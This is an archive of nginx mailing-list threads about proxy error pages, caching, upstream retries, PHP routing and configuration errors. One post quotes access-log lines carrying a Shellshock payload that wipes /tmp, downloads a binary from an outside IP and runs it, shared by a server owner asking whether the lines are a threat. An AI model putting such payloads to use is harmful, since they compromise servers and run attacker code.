you get when you use the test config in the earlier mail? what output do you want? That last one is probably "http 503 with the content of *this* file"; and is probably completely obvious to you; but I don't think it has been explicitly stated here, and it is better to know than to try guessing. > HAProxy returns this: > > HTTP/1.0 503 Service Unavailable > Cache-Control: no-cache > Connection: close > Content-Type: text/html > >

> No server is available to handle this request. > Ok, that's a normal 503. > HAProxy also logs this (raw syslog packet): > > <134>Oct 15 13:17:33 jedc-local haproxy[10104]: 127.0.0.1:64746 [15/Oct/2016:13:17:33.800] xact_in-DK xact_admin/ 0/-1/-1/-1/0 503 212 - - SC-- 0/0/0/0/0 0/0 "POST /2 HTTP/1.0" > > This makes nginx return this back to the browser: > > HTTP/1.1 405 Not Allowed > Server: nginx/1.8.0 > Date: Sat, 15 Oct 2016 11:17:33 GMT > Content-Type: text/html > Content-Length: 172 > Connection: keep-alive And that's the 405 because your config sends the 503 to a static file. > nginx also logs this: > > localhost 127.0.0.1 "-" [15/Oct/2016:13:17:33 +0200] "POST /2 HTTP/1.1" 405 172 503 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" http "-" "-" "-" "-" -/- > There is no mention of the error_page 503 location or any of the resources they specify (logo.png or error503.html) in any of nginx' logs, so I assume that they are not really connected to the problems I see. > Unless you are looking at the nginx debug log, you are not seeing anything about nginx's internal subrequests. If you remove the error_page 503 part or the proxy_intercept_errors part, does the expected http status code get to your client? > Any ideas? I think that the nginx handling of subrequests from a POST for error handling is a bit awkward here. But until someone who cares comes up with an elegant and consistent alternative, I expect that it will remain as-is. Possibly in your case you could convert the POST to a GET by using proxy_method and proxy_pass within your error_page location. That also feels inelegant, but may give the output that you want. Cheers, f -- Francis Daly francis at daoine.org From francis at daoine.org Tue Oct 18 07:14:38 2016 From: francis at daoine.org (Francis Daly) Date: Tue, 18 Oct 2016 08:14:38 +0100 Subject: NGINX Open Source TCP Load Balancing - service discovery In-Reply-To: References: Message-ID: <20161018071438.GK11677@daoine.org> On Mon, Oct 17, 2016 at 02:44:00PM -0700, Matthew Ceroni wrote: Hi there, Untested, but... > https://www.nginx.com/blog/dns-service-discovery-nginx-plus/ > The issue is around where to set the variable. I have tried setting it in > the upstream block but that errors saying set is not valid in this context. > Tried setting it in the stream context, same error. The documentation suggests that "set" is not available within the "stream" system. So you need a different way of setting a variable. Perhaps "map" will do what you want? f -- Francis Daly francis at daoine.org From mdounin at mdounin.ru Tue Oct 18 15:34:03 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 18 Oct 2016 18:34:03 +0300 Subject: nginx-1.10.2 Message-ID: <20161018153403.GJ73038@mdounin.ru> Changes with nginx 1.10.2 18 Oct 2016 *) Change: the "421 Misdirected Request" response now used when rejecting requests to a virtual server different from one negotiated during an SSL handshake; this improves interoperability with some HTTP/2 clients when using client certificates. *) Change: HTTP/2 clients can now start sending request body immediately; the "http2_body_preread_size" directive controls size of the buffer used before nginx will start reading client request body. *) Bugfix: a segmentation fault might occur in a worker process when using HTTP/2 and the "proxy_request_buffering" directive. *) Bugfix: the "Content-Length" request header line was always added to requests passed to backends, including requests without body, when using HTTP/2. 
*) Bugfix: "http request count is zero" alerts might appear in logs when using HTTP/2. *) Bugfix: unnecessary buffering might occur when using the "sub_filter" directive; the issue had appeared in 1.9.4. *) Bugfix: socket leak when using HTTP/2. *) Bugfix: an incorrect response might be returned when using the "aio threads" and "sendfile" directives; the bug had appeared in 1.9.13. *) Workaround: OpenSSL 1.1.0 compatibility. -- Maxim Dounin http://nginx.org/ From francis at daoine.org Tue Oct 18 19:12:40 2016 From: francis at daoine.org (Francis Daly) Date: Tue, 18 Oct 2016 20:12:40 +0100 Subject: Problem with cache key In-Reply-To: <243ee282884a2112a03b2d278a3f396f.NginxMailingListEnglish@forum.nginx.org> References: <243ee282884a2112a03b2d278a3f396f.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161018191240.GL11677@daoine.org> On Mon, Oct 17, 2016 at 09:50:15AM -0400, CarstenK. wrote: Hi there, > If i send a request to url A with Chrom and another request with curl or > firefox i have a cache miss. > If isend a request to the same url with curl on two different machines the > answer is a cache hit, thats fine. If you look at the request from nginx to upstream, and the response from upstream to nginx, can you see the headers? Particularly the Vary: header of the response -- often it will include "User-Agent", which would explain what you see. If that is the issue, and you know that upstream sends the same content to all user-agents, then you can configure nginx so that that piece is not used in nginx's decision to cache. According to http://nginx.org/r/proxy_ignore_headers, > proxy_ignore_headers X-Accel-Expires Expires Cache-Control; "Vary" is the most likely of the fields that you could ignore that you do not. Cheers, f -- Francis Daly francis at daoine.org From kworthington at gmail.com Wed Oct 19 14:09:37 2016 From: kworthington at gmail.com (Kevin Worthington) Date: Wed, 19 Oct 2016 10:09:37 -0400 Subject: [nginx-announce] nginx-1.10.2 In-Reply-To: <20161018153408.GK73038@mdounin.ru> References: <20161018153408.GK73038@mdounin.ru> Message-ID: Hello Nginx users, Now available: Nginx 1.10.2 for Windows https://kevinworthington.com/ nginxwin1102 (32-bit and 64-bit versions) These versions are to support legacy users who are already using Cygwin based builds of Nginx. Officially supported native Windows binaries are at nginx.org. Announcements are also available here: Twitter http://twitter.com/kworthington Google+ https://plus.google.com/+KevinWorthington/ Thank you, Kevin -- Kevin Worthington kworthington *@* (gmail] [dot} {com) http://kevinworthington.com/ http://twitter.com/kworthington https://plus.google.com/+KevinWorthington/ On Tue, Oct 18, 2016 at 11:34 AM, Maxim Dounin wrote: > Changes with nginx 1.10.2 18 Oct > 2016 > > *) Change: the "421 Misdirected Request" response now used when > rejecting requests to a virtual server different from one negotiated > during an SSL handshake; this improves interoperability with some > HTTP/2 clients when using client certificates. > > *) Change: HTTP/2 clients can now start sending request body > immediately; the "http2_body_preread_size" directive controls size > of > the buffer used before nginx will start reading client request body. > > *) Bugfix: a segmentation fault might occur in a worker process when > using HTTP/2 and the "proxy_request_buffering" directive. > > *) Bugfix: the "Content-Length" request header line was always added to > requests passed to backends, including requests without body, when > using HTTP/2. 
> > *) Bugfix: "http request count is zero" alerts might appear in logs > when > using HTTP/2. > > *) Bugfix: unnecessary buffering might occur when using the > "sub_filter" > directive; the issue had appeared in 1.9.4. > > *) Bugfix: socket leak when using HTTP/2. > > *) Bugfix: an incorrect response might be returned when using the "aio > threads" and "sendfile" directives; the bug had appeared in 1.9.13. > > *) Workaround: OpenSSL 1.1.0 compatibility. > > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx-announce mailing list > nginx-announce at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx-announce > -------------- next part -------------- An HTML attachment was scrubbed... URL: From marques+nginx at linode.com Wed Oct 19 20:39:41 2016 From: marques+nginx at linode.com (Marques Johansson) Date: Wed, 19 Oct 2016 16:39:41 -0400 Subject: proxy_next_upstream exemption for 429 "too many requests" Message-ID: "proxy_next_upstream error" has exemptions for 402 and 403. Should it not have exemptions for 429 "Too many requests" as well? I want proxied servers' 503 and 429 responses with "Retry-After" to be delivered to the client as the server responded. The 429s in this case contain json bodies. I assume I should use proxy_pass_header to get Retry-After preserved in the responses, but what should I do to get 429 responses returned without modification (short of a feature request that proxy_next_upstream be modified)? -------------- next part -------------- An HTML attachment was scrubbed... URL: From piotrsikora at google.com Thu Oct 20 00:21:27 2016 From: piotrsikora at google.com (Piotr Sikora) Date: Wed, 19 Oct 2016 17:21:27 -0700 Subject: proxy_next_upstream exemption for 429 "too many requests" In-Reply-To: References: Message-ID: Hey Marques, coincidentally, I sent patches for 429 yesterday: http://mailman.nginx.org/pipermail/nginx-devel/2016-October/009003.html http://mailman.nginx.org/pipermail/nginx-devel/2016-October/009004.html Best regards, Piotr Sikora On Wed, Oct 19, 2016 at 1:39 PM, Marques Johansson wrote: > "proxy_next_upstream error" has exemptions for 402 and 403. Should it not > have exemptions for 429 "Too many requests" as well? > > I want proxied servers' 503 and 429 responses with "Retry-After" to be > delivered to the client as the server responded. The 429s in this case > contain json bodies. > > I assume I should use proxy_pass_header to get Retry-After preserved in > the responses, but what should I do to get 429 responses returned without > modification (short of a feature request that proxy_next_upstream be > modified)? > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From piotrsikora at google.com Thu Oct 20 00:37:16 2016 From: piotrsikora at google.com (Piotr Sikora) Date: Wed, 19 Oct 2016 17:37:16 -0700 Subject: proxy_next_upstream exemption for 429 "too many requests" In-Reply-To: References: Message-ID: Hey Marques, > "proxy_next_upstream error" has exemptions for 402 and 403. Should it not > have exemptions for 429 "Too many requests" as well? > > I want proxied servers' 503 and 429 responses with "Retry-After" to be > delivered to the client as the server responded. The 429s in this case > contain json bodies. Actually, after re-reading your email, I'm confused... 
429 responses aren't matched by "proxy_next_upstream error" (with or without my patches), and are passed as-is to the client. Maybe you're using "proxy_intercept_errors" with custom error pages? Best regards, Piotr Sikora From JEDC at ramboll.com Thu Oct 20 09:19:29 2016 From: JEDC at ramboll.com (Jens Dueholm Christensen) Date: Thu, 20 Oct 2016 09:19:29 +0000 Subject: Static or dynamic content In-Reply-To: <20161018062827.GJ11677@daoine.org> References: <20160929220228.GF11677@daoine.org> <20160930105450.GG11677@daoine.org> <20161018062827.GJ11677@daoine.org> Message-ID: On Tuesday, October 18, 2016 08:28 AM Francis Daly wrote, > So: a POST for /x will be handled in @xact, which will return 503, > which will be handled in @error_503, which will be rewritten to a POST > for /error503.html which will be sent to the file error/error503.html, > which will return a 405. > > Is that what you see? Yes - per your comments later in your reply about internal redirects and the debug log, I enabled the debug log which confirms it (several lines have been removed from the following sniplet, but its pretty clear): --- 2016/10/20 10:23:45 [debug] 8408#2492: *1 http upstream request: "/2?" 2016/10/20 10:23:45 [debug] 8408#2492: *1 http proxy status 503 "503 Service Unavailable" 2016/10/20 10:23:45 [debug] 8408#2492: *1 finalize http upstream request: 503 2016/10/20 10:23:45 [debug] 8408#2492: *1 http special response: 503, "/2?" 2016/10/20 10:23:45 [debug] 8408#2492: *1 test location: "@error_503" 2016/10/20 10:23:45 [debug] 8408#2492: *1 using location: @error_503 "/2?" 2016/10/20 10:23:45 [notice] 8408#2492: *1 "^(.*)$" matches "/2" while sending to client, client: 127.0.0.1, server: localhost, request: "POST /2 HTTP/1.1", upstream: "http://127.0.0.1:4431/2", host: "localhost" 2016/10/20 10:23:45 [debug] 8408#2492: *1 http script copy: "/error503.html" 2016/10/20 10:23:45 [debug] 8408#2492: *1 http script regex end 2016/10/20 10:23:45 [notice] 8408#2492: *1 rewritten data: "/error503.html", args: "" while sending to client, client: 127.0.0.1, server: localhost, request: "POST /2 HTTP/1.1", upstream: "http://127.0.0.1:4431/2", host: "localhost" 2016/10/20 10:23:45 [debug] 8408#2492: *1 http finalize request: 405, "/error503.html?" a:1, c:2 2016/10/20 10:23:45 [debug] 8408#2492: *1 http special response: 405, "/error503.html?" 2016/10/20 10:23:45 [debug] 8408#2492: *1 HTTP/1.1 405 Not Allowed Server: nginx/1.8.0 Date: Thu, 20 Oct 2016 08:23:45 GMT Content-Type: text/html Content-Length: 172 Connection: keep-alive --- > Two sets of questions remain: > what output do you get when you use the test config in the earlier mail? Alas I did not try that config yet, but I would assume that my tests would show exactly the same as yours - should I try or is it purely academic? > what output do you want? > That last one is probably "http 503 with the content of *this* file"; > and is probably completely obvious to you; but I don't think it has been > explicitly stated here, and it is better to know than to try guessing. 100% correct. If upstream returns 503 or 404 I would like to have the contents of the error_page for 404 or 503 returned to the client regardless of the HTTP request method used. > If you remove the error_page 503 part or the proxy_intercept_errors part, > does the expected http status code get to your client? Yes! > I think that the nginx handling of subrequests from a POST for error > handling is a bit awkward here. 
But until someone who cares comes up with > an elegant and consistent alternative, I expect that it will remain as-is. Alas.. > Possibly in your case you could convert the POST to a GET by using > proxy_method and proxy_pass within your error_page location. > That also feels inelegant, but may give the output that you want. Yes, similar "solutions" like this (http://leandroardissone.com/post/19690882654/nginx-405-not-allowed ) and others are IMO really ugly and it does make the configfile harder to understand and maintain over time. The "best" (but still ugly!) version I could find is where I catch the 405 error inside the @error_503 location (as described in the answer to this question http://stackoverflow.com/questions/16180947/return-503-for-post-request-in-nginx ), but I dislike the use of if and $request_filename in that solution - and it still doesn't make for easy understanding. How would you suggest I could use proxy_method and proxy_pass within the @error_503 location? I'm comming up short on how to do that without beginning to resend a POST request as a GET request to upstream - a new request that could now potentially succeed (since a haproxy backend server could become available between the POST failed and the request is retried as a GET)? Regards, Jens Dueholm Christensen From marques+nginx at linode.com Thu Oct 20 12:30:21 2016 From: marques+nginx at linode.com (Marques Johansson) Date: Thu, 20 Oct 2016 08:30:21 -0400 Subject: proxy_next_upstream exemption for 429 "too many requests" Message-ID: I was mistaken. I wasn't triggering 429s reliably. They are being passed through as expected. I will use proxy_pass_header Retry-After to get the behavior I wanted for 503s. Some of my server 503s may be application/json while others are text/html. I would like to pass the json responses through while nginx returns its own 503 response instead of server 503 html responses. That doesn't seem to be possible with the existing proxy options. On Wed, Oct 19, 2016 at 8:37 PM, Piotr Sikora wrote: > Hey Marques, > > > "proxy_next_upstream error" has exemptions for 402 and 403. Should it > not > > have exemptions for 429 "Too many requests" as well? > > > > I want proxied servers' 503 and 429 responses with "Retry-After" to be > > delivered to the client as the server responded. The 429s in this case > > contain json bodies. > > Actually, after re-reading your email, I'm confused... 429 responses > aren't matched by "proxy_next_upstream error" (with or without my > patches), and are passed as-is to the client. > > Maybe you're using "proxy_intercept_errors" with custom error pages? > > Best regards, > Piotr Sikora > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From yushang at outlook.com Thu Oct 20 15:06:02 2016 From: yushang at outlook.com (shang yu) Date: Thu, 20 Oct 2016 15:06:02 +0000 Subject: content-type does not match mime type Message-ID: Hi dear all, When I GET a xlsx file from nginx server , the response header Content-Type is application/octet-stream , not the expected application/vnd.openxmlformats-officedocument.spreadsheetml.sheet , why ? many thanks !!! -------------- next part -------------- An HTML attachment was scrubbed... 
URL: From nginx-forum at forum.nginx.org Wed Oct 19 12:52:06 2016 From: nginx-forum at forum.nginx.org (itpp2012) Date: Wed, 19 Oct 2016 08:52:06 -0400 Subject: Using Nginx as proxy content are "striped" In-Reply-To: <941175a1ca8ff11c7cf152258f97a27e.NginxMailingListEnglish@forum.nginx.org> References: <941175a1ca8ff11c7cf152258f97a27e.NginxMailingListEnglish@forum.nginx.org> Message-ID: proxy_pass http://192.168.1.100:38080; (remove the trailing slash) Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270422,270423#msg-270423 From nginx-forum at forum.nginx.org Wed Oct 19 13:36:37 2016 From: nginx-forum at forum.nginx.org (Phani Sreenivasa Prasad) Date: Wed, 19 Oct 2016 09:36:37 -0400 Subject: how to check nginx has really sent response? Message-ID: <35a9ce49d4e91cf9ff2d3d94ca5f0712.NginxMailingListEnglish@forum.nginx.org> Hi I am using fastCGI for my application to talk to nginx. I have a requirement such that when my application processes request and sent the response , would like to check whether nginx also sent response successfully to client. ? How can this be achieved? Is there a way I can register a callback with nginx with any of its directives? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270426,270426#msg-270426 From nginx-forum at forum.nginx.org Wed Oct 19 12:04:21 2016 From: nginx-forum at forum.nginx.org (tbaror) Date: Wed, 19 Oct 2016 08:04:21 -0400 Subject: Using Nginx as proxy content are "striped" Message-ID: <941175a1ca8ff11c7cf152258f97a27e.NginxMailingListEnglish@forum.nginx.org> Hello All, I am using Nginx for proxy to OpenGrok server using following conf below , the issue i have is that the proxy works but seems to be missing content and not works as expected. Any idea how to make it work better? Please advise Thanks server { listen 80; return 301 https://$host$request_uri; } server { listen 443; server_name gfn-docker.daet.local; ssl_certificate /etc/nginx/cert.crt; ssl_certificate_key /etc/nginx/cert.key; ssl on; ssl_session_cache shared:SSL:30m; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4; ssl_prefer_server_ciphers on; access_log /var/log/nginx/jenkins.access.log; location / { auth_basic "Restricted Content"; auth_basic_user_file /etc/nginx/.htpasswd; proxy_pass http://192.168.1.100:38080/; proxy_redirect off; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_max_temp_file_size 0; client_max_body_size 30m; client_body_buffer_size 512k; proxy_connect_timeout 90; proxy_send_timeout 90; proxy_read_timeout 90; proxy_buffer_size 12k; proxy_buffers 4 64k; proxy_busy_buffers_size 128k; proxy_temp_file_write_size 128k; } } Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270422,270422#msg-270422 From nginx-forum at forum.nginx.org Wed Oct 19 14:08:06 2016 From: nginx-forum at forum.nginx.org (tbaror) Date: Wed, 19 Oct 2016 10:08:06 -0400 Subject: Using Nginx as proxy content are "striped" In-Reply-To: References: <941175a1ca8ff11c7cf152258f97a27e.NginxMailingListEnglish@forum.nginx.org> Message-ID: Thanks but now its redirect to the actual server , how i would enforce it pass trough the proxy? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270422,270427#msg-270427 From nginx-forum at forum.nginx.org Wed Oct 19 10:05:54 2016 From: nginx-forum at forum.nginx.org (CarstenK.) 
Date: Wed, 19 Oct 2016 06:05:54 -0400 Subject: Problem with cache key In-Reply-To: <20161018191240.GL11677@daoine.org> References: <20161018191240.GL11677@daoine.org> Message-ID: <7ce0c8b0fd6b5cce9d489fa692315728.NginxMailingListEnglish@forum.nginx.org> Hi Francis, thank you for your fast reply. I took a look at the header nginx response. ##### Header nginx ### Response Header ## Chrome HTTP/1.1 200 OK Server: nginx Date: Wed, 19 Oct 2016 09:54:07 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 15991 Connection: keep-alive Content-Language: de-DE Vary: Accept-Encoding Content-Encoding: gzip X-Cache-Status: MISS ## Firefox HTTP/1.1 200 OK Server: nginx Date: Wed, 19 Oct 2016 09:53:50 GMT Content-Type: text/html;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Content-Language: de-DE Vary: Accept-Encoding Content-Encoding: gzip X-Cache-Status: MISS How can i have a look for the headers of upstream servers? For testing i had set "proxy_ignore_headers" to "X-Accel-Expires Expires Cache-Control Vary Set-Cookie X-Accel-Limit-Rate X-Accel-Buffering X-Accel-Charset" but there is no difference. best, Carsten Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270324,270419#msg-270419 From francis at daoine.org Thu Oct 20 16:23:51 2016 From: francis at daoine.org (Francis Daly) Date: Thu, 20 Oct 2016 17:23:51 +0100 Subject: Static or dynamic content In-Reply-To: References: <20160929220228.GF11677@daoine.org> <20160930105450.GG11677@daoine.org> <20161018062827.GJ11677@daoine.org> Message-ID: <20161020162351.GM11677@daoine.org> On Thu, Oct 20, 2016 at 09:19:29AM +0000, Jens Dueholm Christensen wrote: > On Tuesday, October 18, 2016 08:28 AM Francis Daly wrote, Hi there, > > what output do you get when you use the test config in the earlier mail? > > Alas I did not try that config yet, but I would assume that my tests would show exactly the same as yours - should I try or is it purely academic? Academic now, I think. > If upstream returns 503 or 404 I would like to have the contents of the error_page for 404 or 503 returned to the client regardless of the HTTP request method used. > > Possibly in your case you could convert the POST to a GET by using > > proxy_method and proxy_pass within your error_page location. > How would you suggest I could use proxy_method and proxy_pass within the @error_503 location? > I'm comming up short on how to do that without beginning to resend a POST request as a GET request to upstream - a new request that could now potentially succeed (since a haproxy backend server could become available between the POST failed and the request is retried as a GET)? I was imagining doing a proxy_pass to nginx, not to upstream, for the 503 errors. So dealing with upstream is not a concern. However, I've tried testing this now, and it all seems to work happily if you omit the @named location for error_page. I add "internal" below, to avoid having the url be directly externally-accessible. Does this do what you want it to do? server { listen 8080; error_page 503 /errors/503.html; location / { root html; try_files /offline.html @xact; } location @xact { # this server is "upstream" proxy_pass http://127.0.0.1:8082; proxy_intercept_errors on; } location = /errors/503.html { internal; # this serves $document_root/errors/503.html } } For me, when "upstream" returns 503, I get back 503 with the content of my /usr/local/nginx/html/errors/503.html, whether the initial request was a GET or a POST. 
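As a quick sanity check - assuming the same ports as above, and that html/offline.html does not exist so requests reach @xact - both of these should print an HTTP/1.1 503 status line followed by the contents of errors/503.html:

curl -i http://127.0.0.1:8080/x
curl -i -X POST -d 'x=1' http://127.0.0.1:8080/x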
So perhaps the previous awkwardness was due to the @named location and the various rewrites. If that does do what you want, then you can add something similar for 404, I guess. Cheers, f -- Francis Daly francis at daoine.org From ben+nginx at list-subs.com Sat Oct 22 10:37:50 2016 From: ben+nginx at list-subs.com (Ben) Date: Sat, 22 Oct 2016 11:37:50 +0100 Subject: NGINX and Slim PHP framework Message-ID: <9fb4977a-b0bb-b21a-abf8-88b66626cd9a@list-subs.com> Hi, nginx/1.10.0 & PHP 7.0.8 I'm struggling to get NGINX to work with the Slim PHP framework for paths. The base index.php works fine (e.g. http://example.com works), however if I try a framework path (e.g. http://example.com/hello/test), NGINX sends me what Firefox seems to call a "DMS file" (if I download and open it, it displays the source code from the PHP file). My NGINX config looks as follows: server { listen 80 default_server; listen [::]:80 default_server; root /var/www/html/bobs/public; index index.php; server_name _; location / { try_files $uri $uri/ /index.php$is_args$args =404; } location ~ ^(.+\.php)(.*)$ { fastcgi_split_path_info ^(.+\.php)(.*)$; fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param PATH_INFO $fastcgi_path_info; include fastcgi_params; } } And my SLIM index.php : get('/', function ($request, $response, $args) { return $response->withStatus(200)->write('Hello World!'); }); $app->get('/hello/{name}', function (Request $request, Response $response) { $name = $request->getAttribute('name'); $response->getBody()->write("Hello, $name"); return $response; }); // Run application $app->run(); ?> From me at myconan.net Sat Oct 22 10:41:44 2016 From: me at myconan.net (Edho Arief) Date: Sat, 22 Oct 2016 19:41:44 +0900 Subject: NGINX and Slim PHP framework In-Reply-To: <9fb4977a-b0bb-b21a-abf8-88b66626cd9a@list-subs.com> References: <9fb4977a-b0bb-b21a-abf8-88b66626cd9a@list-subs.com> Message-ID: <1477132904.2942974.763908033.3F3E1563@webmail.messagingengine.com> Hi, On Sat, Oct 22, 2016, at 19:37, Ben wrote: > Hi, > > nginx/1.10.0 & PHP 7.0.8 > > I'm struggling to get NGINX to work with the Slim PHP framework for > paths. > > The base index.php works fine (e.g. http://example.com works), however > if I try a framework path (e.g. http://example.com/hello/test), NGINX > sends me what Firefox seems to call a "DMS file" (if I download and open > it, it displays the source code from the PHP file). > > My NGINX config looks as follows: > > server { > listen 80 default_server; > listen [::]:80 default_server; > root /var/www/html/bobs/public; > index index.php; > server_name _; > location / { > try_files $uri $uri/ /index.php$is_args$args =404; try_files immediately returns the file without doing another location lookup so here it'll just return the index.php as is. index.php should be the last one. It doesn't make sense to have =404 anyway since index.php part will always succeed. From reallfqq-nginx at yahoo.fr Sat Oct 22 13:42:54 2016 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Sat, 22 Oct 2016 15:42:54 +0200 Subject: content-type does not match mime type In-Reply-To: References: Message-ID: Associating types to file extensions is done through the types directive. You probably have a default_type directive in a global location defining it to application/octet-stream. --- *B. 
R.* On Thu, Oct 20, 2016 at 5:06 PM, shang yu wrote: > Hi dear all, > > When I GET a xlsx file from nginx server , the response header > Content-Type is application/octet-stream , not the expected > application/vnd.openxmlformats-officedocument.spreadsheetml.sheet , why ? > many thanks !!! > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Sat Oct 22 10:19:54 2016 From: nginx-forum at forum.nginx.org (janro) Date: Sat, 22 Oct 2016 06:19:54 -0400 Subject: Suspicious log records Message-ID: Hi everyone. I'm newbie with Nginx and with servers and I thought to ask your opinion about the log input I noticed from last night. There's clearly a some sort of malicious attempt in access.log which is repeated four times. In error.log there's only 'closed keepalive connection' records, which matches with those four attempts. Everything runs fine on server side. I just like to know that is this just a normal day in a world of server logs or something critical that need actions? Access.log 61.147.247.161 - - [22/Oct/2016:00:10:14 +0300] "GET / HTTP/1.1" 301 184 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo /tmp/China.Z-axgfh >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo /tmp/China.Z-axgfh >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-" 61.147.247.161 - - [22/Oct/2016:00:11:08 +0300] "GET / HTTP/1.1" 301 184 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-" 61.147.247.161 - - [22/Oct/2016:00:12:28 +0300] "GET / HTTP/1.1" 301 184 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-" 61.147.247.161 - - [22/Oct/2016:00:13:29 +0300] "GET / HTTP/1.1" 301 184 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O 
/tmp/China.Z-xxmb >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-xxmb >> /tmp/Run.sh;echo /tmp/China.Z-xxmb >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-xxmb >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-xxmb >> /tmp/Run.sh;echo /tmp/China.Z-xxmb >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-" Error.log 2016/10/22 00:10:15 [info] 1751#0: *27218 client 61.147.247.161 closed keepalive connection 2016/10/22 00:11:09 [info] 1751#0: *27219 client 61.147.247.161 closed keepalive connection 2016/10/22 00:12:29 [info] 1751#0: *27220 client 61.147.247.161 closed keepalive connection 2016/10/22 00:13:29 [info] 1751#0: *27221 client 61.147.247.161 closed keepalive connection Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270472,270472#msg-270472 From lists at ssl-mail.com Sat Oct 22 16:30:21 2016 From: lists at ssl-mail.com (lists at ssl-mail.com) Date: Sat, 22 Oct 2016 09:30:21 -0700 Subject: nginx 1.11.5 'duplicate' map_hash_bucket_size error when geoip_country block used? Message-ID: <1477153821.3004284.764075641.7D154D74@webmail.messagingengine.com> I have a working nginx/1.11.5 instance, with this in config ... http( ... 134 map_hash_bucket_size 4096; ... ) ... when I add geoip blocking ... http ( + geoip_country /var/lib/GeoIP/GeoIP.dat; + map $geoip_country_code $allowed_country { + default yes; + XX no; # some country ... 134 map_hash_bucket_size 4096; ... ) ... config check now reports nginx: [emerg] "map_hash_bucket_size" directive is duplicate in /etc/nginx/nginx.conf:134 simply commenting out - map_hash_bucket_size 4096; + #map_hash_bucket_size 4096; fixes the config error. Why can't 'map_hash_bucket_size' be set in the presence of the geoip_country snippet? Config error? Bug? other? From nginx-forum at forum.nginx.org Sat Oct 22 16:42:40 2016 From: nginx-forum at forum.nginx.org (itpp2012) Date: 